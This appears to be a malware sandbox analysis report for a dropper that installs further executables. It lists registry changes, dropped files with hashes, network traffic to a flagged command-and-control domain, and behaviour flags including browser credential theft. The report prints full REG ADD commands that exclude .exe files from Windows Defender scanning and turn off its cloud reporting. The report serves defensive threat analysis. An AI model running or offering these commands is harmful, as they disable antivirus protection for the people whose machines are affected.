REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

c:\windows\SysWOW64\reg.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Registry Console Tool

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

2380

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

c:\windows\SysWOW64\reg.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Registry Console Tool

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\kernel32.dll

Add for printing

Total events

18 482

Read events

17 730

Write events

746

Delete events

Modification events


(PID) Process:	(1988) Install.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1
(PID) Process:	(1988) Install.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	IntranetName
Value: 1
(PID) Process:	(1988) Install.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 1
(PID) Process:	(1988) Install.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	AutoDetect
Value: 0
(PID) Process:	(2368) reg.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions
Operation:	write	Name:	exe
Value: 0
(PID) Process:	(2380) reg.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet
Operation:	write	Name:	SpyNetReporting
Value: 0
(PID) Process:	(2864) reg.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions
Operation:	write	Name:	exe
Value: 0
(PID) Process:	(2872) reg.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet
Operation:	write	Name:	SpyNetReporting
Value: 0
(PID) Process:	(2192) powershell.EXE	Key:	HKEY_CLASSES_ROOT\Local Settings\MuiCache\14C\52C64B7E
Operation:	write	Name:	LanguageList
Value: en-US
(PID) Process:	(2192) powershell.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1

Add for printing

Executable files

Suspicious files

Text files

150

Unknown types

Dropped files

PID	Process	Filename		Type
2032	file.exe	C:\Users\admin\AppData\Local\Temp\7zS4C1D.tmp\__data__\config.txt		binary
		MD5:D251554B249B6EFD4EDE16A6856714BF	SHA256:72EED68238E3741EA36DC941030876B4CD777646C639D4DA8FA8B5073BF77824
2192	powershell.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms		binary
		MD5:F6C846D320239C7EF5513019C0EE4A53	SHA256:7CAF7E561AA0BAC5AD5C0D3FC1C8B306AE90B7D7F73DBD19044C0B6FAC804D15
2192	powershell.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\696U1H2VGZ7QUBUI4KZE.temp		binary
		MD5:F6C846D320239C7EF5513019C0EE4A53	SHA256:7CAF7E561AA0BAC5AD5C0D3FC1C8B306AE90B7D7F73DBD19044C0B6FAC804D15
2192	powershell.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFd5fc4.TMP		binary
		MD5:D12147D4849A339C8508A67CDAA0F9AD	SHA256:9A4E0139A51B4755DAA7A3F6BA321F4021E17602696176CA40C2D4C2522956F0
2028	Install.exe	C:\Users\admin\AppData\Local\Temp\7zS4E7E.tmp\Install.exe		executable
		MD5:641EADD9585299DDDF46D16A91582FBE	SHA256:D66BEAC01580E9F730480D4CC8091DC582E6D22A40106A5A1C7F8A6FB0712BC8
2032	file.exe	C:\Users\admin\AppData\Local\Temp\7zS4C1D.tmp\Install.exe		executable
		MD5:A5BCAFA4B983E40E80CE5F7D195BF91A	SHA256:692474B8B6306906BDB8DAFF57FABA4AAE6BCAE7F36504872EF6084CC8B790BA
1988	Install.exe	C:\Windows\system32\GroupPolicy\gpt.ini		text
		MD5:A62CE44A33F1C05FC2D340EA0CA118A4	SHA256:9F2CD4ACF23D565BC8498C989FCCCCF59FD207EF8925111DC63E78649735404A
2384	schtasks.exe	C:\Windows\Tasks\baqkzymadDkdbhQsxA.job		binary
		MD5:7FA18054BB1C5D09F6136FB21F1272F4	SHA256:890B7234968534EC2E23998D87066EA65F50758C095C04664CA0AF266D2FC07E
2192	powershell.EXE	C:\Users\admin\AppData\Local\Temp\ehto2dxd.3u5.psm1		binary
		MD5:C4CA4238A0B923820DCC509A6F75849B	SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2192	powershell.EXE	C:\Users\admin\AppData\Local\Temp\uejazlxz.2j2.ps1		binary
		MD5:C4CA4238A0B923820DCC509A6F75849B	SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
1440	FHYQWsM.exe	GET	200	172.217.18.99:80	http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D	US	der	1.41 Kb	whitelisted
2972	rundll32.exe	POST	200	54.185.139.178:80	http://api2.check-data.xyz/api2/google_api_ifi	US	—	—	malicious
1440	FHYQWsM.exe	GET	200	184.24.77.69:80	http://apps.identrust.com/roots/dstrootcax3.p7c	US	cat	893 b	shared
1440	FHYQWsM.exe	GET	200	172.217.18.99:80	http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEFy5J6A6YKVTEoiTk%2FRTejk%3D	US	der	471 b	whitelisted
1440	FHYQWsM.exe	GET	200	23.45.105.185:80	http://x1.c.lencr.org/	NL	der	717 b	whitelisted
1440	FHYQWsM.exe	GET	200	172.217.18.99:80	http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQDrLFyBxR1WMQr6Mn9JjdU0	US	der	472 b	whitelisted
1440	FHYQWsM.exe	GET	200	184.24.77.52:80	http://r3.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgRB7A5ys5XSOpfz0dPt7QOXbw%3D%3D	US	der	503 b	shared
1440	FHYQWsM.exe	GET	200	178.79.242.128:80	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?9a13c8621d408546	DE	compressed	4.70 Kb	whitelisted
1440	FHYQWsM.exe	GET	200	172.217.18.99:80	http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D	US	der	724 b	whitelisted
1440	FHYQWsM.exe	GET	200	178.79.242.128:80	http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9a88ea110ce21994	DE	compressed	61.4 Kb	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
1440	FHYQWsM.exe	184.24.77.52:80	r3.o.lencr.org	Akamai International B.V.	DE	malicious
1440	FHYQWsM.exe	142.250.185.138:443	www.googleapis.com	GOOGLE	US	whitelisted
1440	FHYQWsM.exe	172.217.18.99:80	ocsp.pki.goog	GOOGLE	US	whitelisted
1440	FHYQWsM.exe	178.79.242.128:80	ctldl.windowsupdate.com	LLNW	DE	malicious
1440	FHYQWsM.exe	3.80.150.121:443	service-domain.xyz	AMAZON-AES	US	suspicious
1440	FHYQWsM.exe	172.217.18.14:443	clients2.google.com	GOOGLE	US	whitelisted
2972	rundll32.exe	54.185.139.178:80	api2.check-data.xyz	AMAZON-02	US	malicious
1440	FHYQWsM.exe	184.24.77.69:80	apps.identrust.com	Akamai International B.V.	DE	suspicious
1440	FHYQWsM.exe	23.45.105.185:80	x1.c.lencr.org	AKAMAI-AS	DE	unknown

DNS requests

Domain	IP	Reputation
teredo.ipv6.microsoft.com	—	whitelisted
service-domain.xyz	3.80.150.121	suspicious
ctldl.windowsupdate.com	178.79.242.128	whitelisted
apps.identrust.com	184.24.77.69 184.24.77.47	shared
x1.c.lencr.org	23.45.105.185	whitelisted
r3.o.lencr.org	184.24.77.52 184.24.77.79 184.24.77.46 184.24.77.67 184.24.77.54 184.24.77.69 184.24.77.57 184.24.77.56 184.24.77.53	shared
www.googleapis.com	142.250.185.138 142.250.74.202 142.250.185.106 142.250.181.234 142.250.185.170 142.250.185.74 172.217.16.138 172.217.18.10 142.250.185.202 142.250.185.234 172.217.16.202 142.250.186.138 216.58.212.170 172.217.18.106 142.250.186.42 142.250.186.74	whitelisted
ocsp.pki.goog	172.217.18.99	whitelisted
clients2.google.com	172.217.18.14	whitelisted
api2.check-data.xyz	54.185.139.178 54.191.228.37	malicious

Threats

PID	Process	Class	Message
—	—	Potentially Bad Traffic	ET INFO Observed Let's Encrypt Certificate for Suspicious TLD (.xyz)
—	—	Potentially Bad Traffic	AV INFO HTTP Request to a *.xyz domain

Add for printing

No debug info

General Info

file

531981FA2658977F0ECDAD58E88F3037

A32FBF450455E965B54506DEA14438E0598A8E08

3ECD4763FFC944FDC67A9027E459CD4F448B1A8D1B36147977AFAF86BBF2A261

196608:91OyP3N/E1u7Yz/qped/kgyLPFZRsCu3hOCVci8L4Xt7uhwp1K:3OI3a1u0KeSgIHRsCuwCVciZXRNK

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

Drops the executable file immediately after the start

Uses Task Scheduler to run other applications

Application was dropped or rewritten from another process

Creates a writable file the system directory

Modifies exclusions in Windows Defender

Steals credentials from Web Browsers

Uses Task Scheduler to autorun other applications

Loads dropped or rewritten executable

Modifies files in the Chrome extension folder

Actions looks like stealing of personal data

SUSPICIOUS

Reads the BIOS version

Starts itself from another location

Executable content was dropped or overwritten

Starts CMD.EXE for commands execution

Uses REG/REGEDIT.EXE to modify register

Executes via Task Scheduler

Reads security settings of Internet Explorer

Executes as Windows Service

Executes scripts

Reads settings of System Certificates

Creates a software uninstall entry

Checks Windows Trust Settings

INFO

The process checks LSA protection

Reads the computer name

Reads the machine GUID from the registry

Checks supported languages

Create files in a temporary directory

Creates files in the program directory

Process checks computer location settings

Dropped object may contain Bitcoin addresses

Creates files or folders in the user directory

Malware configuration

Static information

TRiD

Summary

DOS Header

PE Headers

Sections

Resources

Imports

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events